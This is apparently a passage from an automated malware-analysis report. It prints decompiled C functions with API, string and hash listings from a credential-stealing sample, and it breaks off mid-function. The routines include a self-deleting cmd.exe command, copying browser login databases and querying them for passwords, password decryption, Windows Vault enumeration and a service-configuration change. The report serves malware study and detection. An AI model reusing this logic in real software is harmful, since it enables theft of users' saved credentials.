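The sizes matching is consistent with, but does not prove, the webcam-capture reading; the values the routine passes on to E00414AD1 after the copy are taken from inside that 40-byte block, which is where a frame width, height and bit depth would be, but the decompiler's naming of those locals (_v64, _v68, _v58) is imprecise at 61% quality and should be checked in a debugger before it goes into a report.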

                                  C-Code - Quality: 79%
                                  			E00402A9C() {
                                  				char _v8;
                                  				struct _PROCESS_INFORMATION _v24;
                                  				struct _STARTUPINFOA _v92;
                                  				char _v352;
                                  				char _v816;
                                  				char _v817;
                                  				char _v872;
                                  				void* _t59;
                                  				void* _t66;
                                  				void* _t69;
                                  
                                  				_t59 = _t66;
                                  				_t69 = _t59;
                                  				E004124D7(_t69 + 0x10);
                                  				if( *((intOrPtr*)(_t69 + 0x68)) != 0) {
                                  					TerminateThread( *0x559cb4, 0);
                                  				}
                                  				if( *((intOrPtr*)(_t69 + 0x50)) != 0) {
                                  					E00412612(_t69 + 4,  *((intOrPtr*)(_t69 + 8)), _t69 + 0x14, 0x20006, 0);
                                  					E004124F2(_t69 + 4, E004036F7( &_v8, L"Load"));
                                  					E00405FEB(_v8);
                                  					E00412554(_t69 + 4);
                                  				}
                                  				E00401052( &_v92, 0, 0x44);
                                  				asm("stosd");
                                  				asm("stosd");
                                  				asm("stosd");
                                  				asm("stosd");
                                  				GetModuleFileNameA(0,  &_v352, 0x104);
                                  				E0040102C( &_v872, "cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q ", 0x37);
                                  				E0040102C( &_v817, "\"", 1);
                                  				E0040102C( &_v816,  &_v352, E00401133( &_v352));
                                  				E0040102C(E00401133( &_v352) + 0x38 +  &_v872, "\"", 2);
                                  				CreateProcessA(0,  &_v872, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
                                  				CloseHandle(_v24.hThread);
                                  				CloseHandle(_v24);
                                  				ExitProcess(0);
                                  			}
                                  0x00402a9c
                                  0x00412d01
                                  0x00412d06
                                  0x00412d10
                                  0x00412d19
                                  0x00412d19
                                  0x00412d22
                                  0x00412d36
                                  0x00412d4b
                                  0x00412d53
                                  0x00412d5a
                                  0x00412d5a
                                  0x00412d66
                                  0x00412d70
                                  0x00412d74
                                  0x00412d7a
                                  0x00412d7b
                                  0x00412d84
                                  0x00412d98
                                  0x00412dac
                                  0x00412dcc
                                  0x00412dec
                                  0x00412e0e
                                  0x00412e1d
                                  0x00412e22
                                  0x00412e25

                                  APIs
                                    • Part of subcall function 004124D7: RegDeleteKeyW.ADVAPI32(80000001,?), ref: 004124DE
                                  • TerminateThread.KERNEL32(00000000,?,?), ref: 00412D19
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 00412D84
                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00412E0E
                                  • CloseHandle.KERNEL32(?), ref: 00412E1D
                                  • CloseHandle.KERNEL32(?), ref: 00412E22
                                  • ExitProcess.KERNEL32 ref: 00412E25
                                  Strings
                                  • cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q , xrefs: 00412D92
                                  • Load, xrefs: 00412D3B
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleProcess$CreateDeleteExitFileModuleNameTerminateThread
                                  • String ID: Load$cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
                                  • API String ID: 3630425516-2018186591
                                  • Opcode ID: 7d8412575df04c221866460368bba47d86fea5181df5bc930e079ec84a73bd12
                                  • Instruction ID: 037c922c3f030f8a7e2167b9092222fb162bc460f9f39b1e2300c97669b415f7
                                  • Opcode Fuzzy Hash: 7d8412575df04c221866460368bba47d86fea5181df5bc930e079ec84a73bd12
                                  • Instruction Fuzzy Hash: 623167B1900619BFDB11EBA1CD86EEF777DFF04304F004476B205A6191DB78AE948BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E00413EBA() {
                                  				void* _v8;
                                  				struct _PROCESS_INFORMATION _v24;
                                  				struct _STARTUPINFOA _v100;
                                  				int _t10;
                                  				void* _t23;
                                  				int _t24;
                                  				CHAR* _t26;
                                  
                                  				_v8 = 0;
                                  				_t10 = GetCurrentProcess();
                                  				__imp__IsWow64Process(_t10,  &_v8);
                                  				if(_t10 != 0) {
                                  					if(_v8 == 0) {
                                  						_t10 = E0041405F(_t23, __eflags);
                                  						__eflags = _t10;
                                  						if(_t10 != 0) {
                                  							_t24 = _t10;
                                  							goto L6;
                                  						}
                                  					} else {
                                  						_t26 = VirtualAlloc(0, 0xff, 0x1000, 0x40);
                                  						GetWindowsDirectoryA(_t26, 0x104);
                                  						E0040102C( &(_t26[lstrlenA(_t26)]), "\\System32\\cmd.exe", 0x14);
                                  						E00401052( &_v100, 0, 0x44);
                                  						asm("stosd");
                                  						asm("stosd");
                                  						asm("stosd");
                                  						asm("stosd");
                                  						_t10 = CreateProcessA(_t26, 0, 0, 0, 0, 0x8000000, 0, 0,  &_v100,  &_v24);
                                  						if(_t10 != 0) {
                                  							Sleep(0x3e8);
                                  							_t24 = _v24.dwProcessId;
                                  							L6:
                                  							return E00413F7F(_t24);
                                  						}
                                  					}
                                  				}
                                  				return _t10;
                                  			}
                                  0x00413ec9
                                  0x00413ecc
                                  0x00413ed3
                                  0x00413edb
                                  0x00413ee4
                                  0x00413f6a
                                  0x00413f6f
                                  0x00413f71
                                  0x00413f73
                                  0x00000000
                                  0x00413f73
                                  0x00413eea
                                  0x00413efd
                                  0x00413f05
                                  0x00413f1c
                                  0x00413f2b
                                  0x00413f35
                                  0x00413f39
                                  0x00413f3a
                                  0x00413f3b
                                  0x00413f50
                                  0x00413f58
                                  0x00413f5f
                                  0x00413f65
                                  0x00413f75
                                  0x00000000
                                  0x00413f75
                                  0x00413f58
                                  0x00413ee4
                                  0x00413f7e

                                  APIs
                                  • GetCurrentProcess.KERNEL32(?,00000000,74A313FB,00000000), ref: 00413ECC
                                  • IsWow64Process.KERNEL32(00000000), ref: 00413ED3
                                  • VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000040), ref: 00413EF7
                                  • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 00413F05
                                  • lstrlenA.KERNEL32(00000000,\System32\cmd.exe,00000014), ref: 00413F13
                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00413F50
                                  • Sleep.KERNEL32(000003E8), ref: 00413F5F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process$AllocCreateCurrentDirectorySleepVirtualWindowsWow64lstrlen
                                  • String ID: \System32\cmd.exe
                                  • API String ID: 3151064845-2003734499
                                  • Opcode ID: ed219067b45a991398468e4a26b8bc153abac1b375d46e51515a851acaccb22f
                                  • Instruction ID: afe1c3a2dd0aca87645a04bed0ab53e4b63e38e155d51139ff1440feea8eaa1f
                                  • Opcode Fuzzy Hash: ed219067b45a991398468e4a26b8bc153abac1b375d46e51515a851acaccb22f
                                  • Instruction Fuzzy Hash: 6D1181B1A04309BFFB109BB59C49FEF767CEB08785F004036F605E6290DA789E458669
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040B87D(WCHAR* __ecx, char* __edx, void* __eflags) {
                                  				void* _v8;
                                  				int _v12;
                                  				int _v16;
                                  				short _v536;
                                  				char* _t32;
                                  				WCHAR* _t33;
                                  
                                  				_v12 = 0x104;
                                  				_v16 = 1;
                                  				_t32 = __edx;
                                  				_t33 = __ecx;
                                  				E00401052( &_v536, 0, 0x104);
                                  				lstrcpyW( &_v536, L"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\");
                                  				lstrcatW( &_v536, _t33);
                                  				if(RegOpenKeyExW(0x80000002,  &_v536, 0, 1,  &_v8) != 0) {
                                  					return 0;
                                  				}
                                  				RegQueryValueExW(_v8, L"Path", 0,  &_v16, _t32,  &_v12);
                                  				RegCloseKey(_v8);
                                  				return 1;
                                  			}
                                  0x0040b891
                                  0x0040b89b
                                  0x0040b8a1
                                  0x0040b8a3
                                  0x0040b8a5
                                  0x0040b8b9
                                  0x0040b8c7
                                  0x0040b8e8
                                  0x00000000
                                  0x0040b910
                                  0x0040b8fd
                                  0x0040b906
                                  0x00000000

                                  APIs
                                  • lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0040B8B9
                                  • lstrcatW.KERNEL32 ref: 0040B8C7
                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00409E8E,?,00000104,00000000), ref: 0040B8E0
                                  • RegQueryValueExW.ADVAPI32(00409E8E,Path,00000000,?,?,?,?,00000104,00000000), ref: 0040B8FD
                                  • RegCloseKey.ADVAPI32(00409E8E,?,00000104,00000000), ref: 0040B906
                                  Strings
                                  • Path, xrefs: 0040B8F5
                                  • Software\Microsoft\Windows\CurrentVersion\App Paths\, xrefs: 0040B8B3
                                  • thunderbird.exe, xrefs: 0040B8BF
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenQueryValuelstrcatlstrcpy
                                  • String ID: Path$Software\Microsoft\Windows\CurrentVersion\App Paths\$thunderbird.exe
                                  • API String ID: 3135247354-1374996286
                                  • Opcode ID: 145a1f37adbbfc8c3e5f119a952875368c6e1147b4b001a2de5ceb485c9eb7eb
                                  • Instruction ID: 3df0df8215fcb83d59d950a1b29e9a277ea2ca522fea2b5b845973b94dc247ed
                                  • Opcode Fuzzy Hash: 145a1f37adbbfc8c3e5f119a952875368c6e1147b4b001a2de5ceb485c9eb7eb
                                  • Instruction Fuzzy Hash: 7D111EB2A4020CBFDB10EBA5DD49FDA7BBCEB54344F1044B6B605E2190E6749F448BA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 92%
                                  			E0040BC0D(intOrPtr __ecx, void* __eflags, char _a4, signed int _a8, char _a12, char _a16, intOrPtr _a20) {
                                  				WCHAR* _v12;
                                  				char _v16;
                                  				WCHAR* _v20;
                                  				signed int _v24;
                                  				signed int _v28;
                                  				signed int _v32;
                                  				char _v36;
                                  				char _v40;
                                  				char _v44;
                                  				char _v48;
                                  				intOrPtr _v52;
                                  				char _v56;
                                  				char _v60;
                                  				char _v64;
                                  				char _v68;
                                  				char _v72;
                                  				intOrPtr _v76;
                                  				char _v80;
                                  				char _v84;
                                  				char _v88;
                                  				int _t148;
                                  				intOrPtr* _t160;
                                  				void* _t161;
                                  				char _t165;
                                  				char _t177;
                                  				char _t178;
                                  				char _t188;
                                  				char* _t189;
                                  				char* _t190;
                                  				char* _t191;
                                  				void* _t192;
                                  				void* _t194;
                                  				char _t198;
                                  				char _t223;
                                  				intOrPtr _t233;
                                  				char* _t251;
                                  				char* _t255;
                                  				void* _t322;
                                  				void* _t323;
                                  				void* _t324;
                                  				void* _t325;
                                  				void* _t326;
                                  				void* _t327;
                                  				char _t331;
                                  				WCHAR* _t337;
                                  				intOrPtr _t338;
                                  				void* _t339;
                                  				void* _t340;
                                  
                                  				_t343 = __eflags;
                                  				_v24 = _v24 & 0x00000000;
                                  				_v28 = _v28 & 0x00000000;
                                  				_t233 = __ecx;
                                  				_t322 = 0x1a;
                                  				_v52 = __ecx;
                                  				E00410C8A( &_v12, _t322, __eflags);
                                  				_t329 = "\\";
                                  				E0040357C( &_v12, _t322, __eflags, "\\");
                                  				_t323 = 8;
                                  				E00403447( &_v12, _t343, E004035B9( &_v48, _t323, _t343));
                                  				E00405FEB(_v48);
                                  				_t336 = L".tmp";
                                  				E0040357C( &_v12, _t323, _t343, L".tmp");
                                  				_t324 = 0x1a;
                                  				E00410C8A( &_v20, _t324, _t343);
                                  				E0040357C( &_v20, _t324, _t343, _t329);
                                  				_t325 = 8;
                                  				E00403447( &_v20, _t343, E004035B9( &_v48, _t325, _t343));
                                  				E00405FEB(_v48);
                                  				E0040357C( &_v20, _t325, _t343, _t336);
                                  				_t344 = _a12;
                                  				_t251 =  &_v48;
                                  				if(_a12 == 0) {
                                  					_push(0x1c);
                                  				} else {
                                  					_push(0x1a);
                                  				}
                                  				_pop(_t326);
                                  				E00403549( &_v24, E00410C8A(_t251, _t326, _t344));
                                  				E00405FEB(_v48);
                                  				E0040357C( &_v24, _t326, _t344, _a4);
                                  				_t345 = _a12;
                                  				_t255 =  &_a12;
                                  				if(_a12 == 0) {
                                  					_push(0x1c);
                                  				} else {
                                  					_push(0x1a);
                                  				}
                                  				_pop(_t327);
                                  				E00403549( &_v28, E00410C8A(_t255, _t327, _t345));
                                  				E00405FEB(_a12);
                                  				E0040357C( &_v28, _t327, _t345, _a8);
                                  				_t148 = PathFileExistsW(_v24);
                                  				_t337 = _v28;
                                  				if(_t148 == 0 || PathFileExistsW(_t337) == 0 || CopyFileW(_v24, _v12, 0) == 0 || CopyFileW(_t337, _v20, 0) == 0) {
                                  					L12:
                                  					_t331 = 0;
                                  					goto L13;
                                  				} else {
                                  					E00403549( &_v24,  &_v12);
                                  					_t160 = E00403666( &_v24,  &_a12);
                                  					_t161 =  *((intOrPtr*)(_t233 + 0x30))( *_t160,  &_v56);
                                  					_t268 = _a12;
                                  					E00405FEB(_a12);
                                  					if(_t161 == 0) {
                                  						_v32 = _v32 & 0x00000000;
                                  						_a8 = _a8 & 0x00000000;
                                  						_t165 = E0040C63E(_t268, _t268,  &_v32,  &_a8);
                                  						_t340 = _t339 + 0x10;
                                  						_t331 = 1;
                                  						__eflags = _t165;
                                  						if(_t165 == 0) {
                                  							L36:
                                  							 *((intOrPtr*)(_t233 + 0x60))();
                                  							 *((intOrPtr*)(_t233 + 0x34))();
                                  							E0040373F(_t340,  &_v12);
                                  							E0041142A(_v56);
                                  							E0040373F(_t340,  &_v20);
                                  							E0041142A(_v16);
                                  							L13:
                                  							E00405FEB(_v20);
                                  							E00405FEB(_v12);
                                  							E00405FEB(_t337);
                                  							E00405FEB(_v24);
                                  							return _t331;
                                  						}
                                  						__eflags = _a16;
                                  						_t176 =  !=  ? "select signon_realm, origin_url, username_value, password_value from wow_logins" : "select signon_realm, origin_url, username_value, password_value from logins";
                                  						_t177 =  *((intOrPtr*)(_t233 + 0x38))(_v56,  !=  ? "select signon_realm, origin_url, username_value, password_value from wow_logins" : "select signon_realm, origin_url, username_value, password_value from logins", 0xffffffff,  &_v16, 0);
                                  						_t340 = _t340 + 0x14;
                                  						__eflags = _t177;
                                  						if(_t177 != 0) {
                                  							goto L36;
                                  						}
                                  						_t178 =  *((intOrPtr*)(_t233 + 0x44))(_v16);
                                  						_pop(_t268);
                                  						__eflags = _t178 - 0x64;
                                  						if(_t178 != 0x64) {
                                  							L35:
                                  							__eflags = _t178;
                                  							if(_t178 != 0) {
                                  								goto L11;
                                  							}
                                  							goto L36;
                                  						}
                                  						_t338 = _t233;
                                  						do {
                                  							_a16 = E00405F68(_t331);
                                  							_t335 = E00405F68(_t331);
                                  							_a4 = _t186;
                                  							_v48 = E00405F68(1);
                                  							_t188 = E00405F68(1);
                                  							_a12 = _t188;
                                  							_t189 =  *((intOrPtr*)(_t338 + 0x40))(_v16, 0);
                                  							__eflags =  *_t189;
                                  							if( *_t189 != 0) {
                                  								E00403237( &_a4, E004034D1( &_v60, _t189));
                                  								E00405FEB(_v60);
                                  								_t335 = _a4;
                                  							}
                                  							_t190 =  *((intOrPtr*)(_t338 + 0x40))(_v16, 1);
                                  							__eflags =  *_t190;
                                  							if( *_t190 != 0) {
                                  								E00403237( &_v48, E004034D1( &_v64, _t190));
                                  								E00405FEB(_v64);
                                  							}
                                  							_t191 =  *((intOrPtr*)(_t338 + 0x40))(_v16, 2);
                                  							__eflags =  *_t191;
                                  							if( *_t191 != 0) {
                                  								E00403237( &_a12, E004034D1( &_v68, _t191));
                                  								E00405FEB(_v68);
                                  							}
                                  							_t192 =  *((intOrPtr*)(_t338 + 0x5c))(_v16, 3, _v32, _a8);
                                  							_t194 = E0040C6BD( *((intOrPtr*)(_t338 + 0x54))(), _t192, _v16, 3);
                                  							_t340 = _t340 - 0xc + 0x24;
                                  							E00403237( &_a16, E004034D1( &_v72, _t194));
                                  							E00405FEB(_v72);
                                  							_t198 = E0040319E( &_a12);
                                  							__eflags = _t198;
                                  							if(_t198 > 0) {
                                  								L26:
                                  								_v88 = 0;
                                  								_v84 = 0;
                                  								_v80 = 0;
                                  								__eflags = E0040319E( &_a4);
                                  								if(__eflags > 0) {
                                  									E00403549( &_v88, E004031AF( &_a4, __eflags,  &_v36));
                                  									E00405FEB(_v36);
                                  									_v36 = 0;
                                  								}
                                  								__eflags = E0040319E( &_a12);
                                  								if(__eflags > 0) {
                                  									E00403549( &_v84, E004031AF( &_a12, __eflags,  &_v40));
                                  									E00405FEB(_v40);
                                  									_v40 = 0;
                                  								}
                                  								__eflags = E0040319E( &_a16);
                                  								if(__eflags != 0) {
                                  									E00403549( &_v80, E004031AF( &_a16, __eflags,  &_v44));
                                  									E00405FEB(_v44);
                                  									_v44 = 0;
                                  								}
                                  								_t340 = _t340 - 0x10;
                                  								_v76 = _a20;
                                  								E00401FF2(_t340,  &_v88);
                                  								E00402028(_t338);
                                  								E00401441( &_v88);
                                  							} else {
                                  								_t223 = E0040319E( &_a16);
                                  								__eflags = _t223;
                                  								if(_t223 <= 0) {
                                  									goto L33;
                                  								}
                                  								goto L26;
                                  							}
                                  							L33:
                                  							E00405FEB(_a12);
                                  							E00405FEB(_v48);
                                  							E00405FEB(_t335);
                                  							E00405FEB(_a16);
                                  							_t178 =  *((intOrPtr*)(_t338 + 0x44))(_v16);
                                  							_pop(_t268);
                                  							_t331 = 1;
                                  							__eflags = _t178 - 0x64;
                                  						} while (_t178 == 0x64);
                                  						_t337 = _v28;
                                  						_t233 = _v52;
                                  						goto L35;
                                  					}
                                  					L11:
                                  					E0040373F(_t340,  &_v12);
                                  					E0041142A(_t268);
                                  					E0040373F(_t340,  &_v20);
                                  					E0041142A();
                                  					goto L12;
                                  				}
                                  			}
                                  0x0040bc0d
                                  0x0040bc13
                                  0x0040bc17
                                  0x0040bc1e
                                  0x0040bc25
                                  0x0040bc26
                                  0x0040bc29
                                  0x0040bc2e
                                  0x0040bc37
                                  0x0040bc3e
                                  0x0040bc4b
                                  0x0040bc53
                                  0x0040bc58
                                  0x0040bc61
                                  0x0040bc68
                                  0x0040bc6c
                                  0x0040bc75
                                  0x0040bc7c
                                  0x0040bc89
                                  0x0040bc91
                                  0x0040bc9a
                                  0x0040bc9f
                                  0x0040bca3
                                  0x0040bca6
                                  0x0040bcac
                                  0x0040bca8
                                  0x0040bca8
                                  0x0040bca8
                                  0x0040bcae
                                  0x0040bcb8
                                  0x0040bcc0
                                  0x0040bccb
                                  0x0040bcd0
                                  0x0040bcd4
                                  0x0040bcd7
                                  0x0040bcdd
                                  0x0040bcd9
                                  0x0040bcd9
                                  0x0040bcd9
                                  0x0040bcdf
                                  0x0040bce9
                                  0x0040bcf1
                                  0x0040bcfc
                                  0x0040bd0a
                                  0x0040bd0c
                                  0x0040bd11
                                  0x0040bd8d
                                  0x0040bd8d
                                  0x00000000
                                  0x0040bd3a
                                  0x0040bd41
                                  0x0040bd4d
                                  0x0040bd58
                                  0x0040bd5d
                                  0x0040bd62
                                  0x0040bd69
                                  0x0040bdb7
                                  0x0040bdbe
                                  0x0040bdcb
                                  0x0040bdd2
                                  0x0040bdd5
                                  0x0040bdd6
                                  0x0040bdd8
                                  0x0040c017
                                  0x0040c01a
                                  0x0040c021
                                  0x0040c02a
                                  0x0040c02f
                                  0x0040c03a
                                  0x0040c03f
                                  0x0040bd8f
                                  0x0040bd92
                                  0x0040bd9a
                                  0x0040bda1
                                  0x0040bda9
                                  0x0040bdb4
                                  0x0040bdb4
                                  0x0040bdde
                                  0x0040bdf4
                                  0x0040bdfb
                                  0x0040bdfe
                                  0x0040be01
                                  0x0040be03
                                  0x00000000
                                  0x00000000
                                  0x0040be0c
                                  0x0040be0f
                                  0x0040be10
                                  0x0040be13
                                  0x0040c00f
                                  0x0040c00f
                                  0x0040c011
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040c011
                                  0x0040be19
                                  0x0040be1b
                                  0x0040be24
                                  0x0040be2e
                                  0x0040be31
                                  0x0040be3d
                                  0x0040be40
                                  0x0040be4a
                                  0x0040be4d
                                  0x0040be52
                                  0x0040be55
                                  0x0040be64
                                  0x0040be6c
                                  0x0040be71
                                  0x0040be71
                                  0x0040be78
                                  0x0040be7d
                                  0x0040be80
                                  0x0040be8f
                                  0x0040be97
                                  0x0040be97
                                  0x0040bea1
                                  0x0040bea6
                                  0x0040bea9
                                  0x0040beb8
                                  0x0040bec0
                                  0x0040bec0
                                  0x0040bed3
                                  0x0040bee7
                                  0x0040beec
                                  0x0040befc
                                  0x0040bf04
                                  0x0040bf0c
                                  0x0040bf11
                                  0x0040bf13
                                  0x0040bf25
                                  0x0040bf2a
                                  0x0040bf2d
                                  0x0040bf30
                                  0x0040bf38
                                  0x0040bf3a
                                  0x0040bf4c
                                  0x0040bf54
                                  0x0040bf59
                                  0x0040bf59
                                  0x0040bf64
                                  0x0040bf66
                                  0x0040bf78
                                  0x0040bf80
                                  0x0040bf85
                                  0x0040bf85
                                  0x0040bf90
                                  0x0040bf92
                                  0x0040bfa4
                                  0x0040bfac
                                  0x0040bfb1
                                  0x0040bfb1
                                  0x0040bfb7
                                  0x0040bfba
                                  0x0040bfc3
                                  0x0040bfca
                                  0x0040bfd2
                                  0x0040bf15
                                  0x0040bf18
                                  0x0040bf1d
                                  0x0040bf1f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040bf1f
                                  0x0040bfd7
                                  0x0040bfda
                                  0x0040bfe2
                                  0x0040bfe9
                                  0x0040bff1
                                  0x0040bff9
                                  0x0040bffc
                                  0x0040bfff
                                  0x0040c000
                                  0x0040c000
                                  0x0040c009
                                  0x0040c00c
                                  0x00000000
                                  0x0040c00c
                                  0x0040bd6b
                                  0x0040bd72
                                  0x0040bd77
                                  0x0040bd82
                                  0x0040bd87
                                  0x00000000
                                  0x0040bd8c

                                  APIs
                                    • Part of subcall function 00410C8A: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 00410CBB
                                    • Part of subcall function 00403447: lstrcatW.KERNEL32 ref: 00403477
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040BD0A
                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040BD14
                                  • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 0040BD28
                                  • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 0040BD34
                                    • Part of subcall function 0040C63E: LocalFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040BDD0,?,?,00000000,?), ref: 0040C6A8
                                    • Part of subcall function 0040C63E: LocalFree.KERNEL32(?,00000000,00000000,00000000,00000000,?,0040BDD0,?,?,00000000,?), ref: 0040C6B1
                                    • Part of subcall function 0040C6BD: LocalAlloc.KERNEL32(00000040,-0000001F,?,?,?,00000000,?,00000000), ref: 0040C745
                                    • Part of subcall function 0040C6BD: BCryptDecrypt.BCRYPT(?,0000000C,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,?,00000000), ref: 0040C773
                                    • Part of subcall function 0040C6BD: LocalFree.KERNEL32(?), ref: 0040C7FB
                                    • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,74A313FB,?,00405B8D,.bss,00000000), ref: 004034DA
                                    • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,?,00405B8D,.bss,00000000), ref: 004034E7
                                    • Part of subcall function 004034D1: lstrcpyA.KERNEL32(00000000,?,?,00405B8D,.bss,00000000), ref: 004034FA
                                    • Part of subcall function 00403237: lstrcatA.KERNEL32(00000000,74A313FB,?,00000000,?,004036D6,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 00403263
                                    • Part of subcall function 0040319E: lstrlenA.KERNEL32(00000000,004031C6,74A313FB,00000000,00000000, 6@,004033EE, 6@,00000000,-00000001,74A313FB,?,00403620,00000000,?,?), ref: 004031A5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileFreeLocal$Pathlstrlen$CopyExistslstrcat$AllocCryptDecryptFolderSpecialVirtuallstrcpy
                                  • String ID: .tmp$select signon_realm, origin_url, username_value, password_value from logins$select signon_realm, origin_url, username_value, password_value from wow_logins
                                  • API String ID: 881303001-3832748974
                                  • Opcode ID: 32df938802f2d974345929882adc4447611ad76f7e070dd058d2dd4147e58294
                                  • Instruction ID: ba20cf8de6aee4928ce48004bd15a5688bda43775cfbd645d5ca8aed8c6f7f47
                                  • Opcode Fuzzy Hash: 32df938802f2d974345929882adc4447611ad76f7e070dd058d2dd4147e58294
                                  • Instruction Fuzzy Hash: 9AD10B71900109ABDB05EFA6DC92AEEBB79EF44309F10413EF512B61E1DF389A45CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 94%
                                  			E0040ACBE(void* __ecx) {
                                  				struct HINSTANCE__* _t17;
                                  				intOrPtr _t21;
                                  				intOrPtr _t24;
                                  				void* _t27;
                                  				void* _t45;
                                  
                                  				_t27 = __ecx;
                                  				_t45 = __ecx;
                                  				_t17 = LoadLibraryA("vaultcli.dll");
                                  				 *(_t45 + 0xc0) = _t17;
                                  				_t46 = _t17;
                                  				if(_t17 == 0) {
                                  					L7:
                                  					__eflags = 0;
                                  					return 0;
                                  				} else {
                                  					_push(_t27);
                                  					 *((intOrPtr*)(_t45 + 0x8c)) = E00411E88(_t17, "VaultOpenVault", _t46);
                                  					 *((intOrPtr*)(_t45 + 0x90)) = E00411E88( *(_t45 + 0xc0), "VaultCloseVault", _t46);
                                  					_t21 = E00411E88( *(_t45 + 0xc0), "VaultEnumerateItems", _t46);
                                  					_t43 = "VaultGetItem";
                                  					 *((intOrPtr*)(_t45 + 0x94)) = _t21;
                                  					 *((intOrPtr*)(_t45 + 0x98)) = E00411E88( *(_t45 + 0xc0), "VaultGetItem", _t46);
                                  					 *((intOrPtr*)(_t45 + 0x9c)) = E00411E88( *(_t45 + 0xc0), _t43, _t46);
                                  					_t24 = E00411E88( *(_t45 + 0xc0), "VaultFree", _t46);
                                  					 *((intOrPtr*)(_t45 + 0xa0)) = _t24;
                                  					if( *((intOrPtr*)(_t45 + 0x8c)) == 0 ||  *((intOrPtr*)(_t45 + 0x94)) == 0 ||  *((intOrPtr*)(_t45 + 0x90)) == 0 ||  *((intOrPtr*)(_t45 + 0x98)) == 0 || _t24 == 0) {
                                  						goto L7;
                                  					} else {
                                  						return 1;
                                  					}
                                  				}
                                  			}
                                  0x0040acbe
                                  0x0040acc4
                                  0x0040acc6
                                  0x0040accc
                                  0x0040acd2
                                  0x0040acd4
                                  0x0040ad88
                                  0x0040ad88
                                  0x0040ad8b
                                  0x0040acda
                                  0x0040acdb
                                  0x0040acf3
                                  0x0040ad09
                                  0x0040ad0f
                                  0x0040ad1a
                                  0x0040ad21
                                  0x0040ad34
                                  0x0040ad4a
                                  0x0040ad50
                                  0x0040ad58
                                  0x0040ad65
                                  0x00000000
                                  0x0040ad83
                                  0x0040ad87
                                  0x0040ad87
                                  0x0040ad65

                                  APIs
                                  • LoadLibraryA.KERNEL32(vaultcli.dll), ref: 0040ACC6
                                    • Part of subcall function 00411E88: lstrcmpA.KERNEL32(?,Q2A,?,open,00413251), ref: 00411EC1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoadlstrcmp
                                  • String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                  • API String ID: 2493137890-3967309459
                                  • Opcode ID: 4f25305d574363695d8410a3db61320778bba206828fdc803e7d133c1409c789
                                  • Instruction ID: 2a90ba8d4adaf7cda04c615fa43a8d23c2bd42836fdc2a547e2a1ab5da71d687
                                  • Opcode Fuzzy Hash: 4f25305d574363695d8410a3db61320778bba206828fdc803e7d133c1409c789
                                  • Instruction Fuzzy Hash: 24114235A017018BD7249B71A801BDBB3E6AF85341F54893F986E97781DF38A882CB09
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040D33C(short** _a4, int _a8) {
                                  				void* _t3;
                                  				short* _t9;
                                  				void* _t12;
                                  				short* _t14;
                                  				void* _t16;
                                  
                                  				_t14 = 0;
                                  				_t3 = OpenSCManagerW(0, L"ServicesActive", 1);
                                  				_t16 = _t3;
                                  				if(_t16 != 0) {
                                  					_t12 = OpenServiceW(_t16,  *_a4, 2);
                                  					if(_t12 != 0) {
                                  						if(ChangeServiceConfigW(_t12, 0xffffffff, _a8, 0xffffffff, 0, 0, 0, 0, 0, 0, 0) != 0) {
                                  							_t14 = 1;
                                  						}
                                  						CloseServiceHandle(_t16);
                                  						CloseServiceHandle(_t12);
                                  						_t9 = _t14;
                                  					} else {
                                  						CloseServiceHandle(_t16);
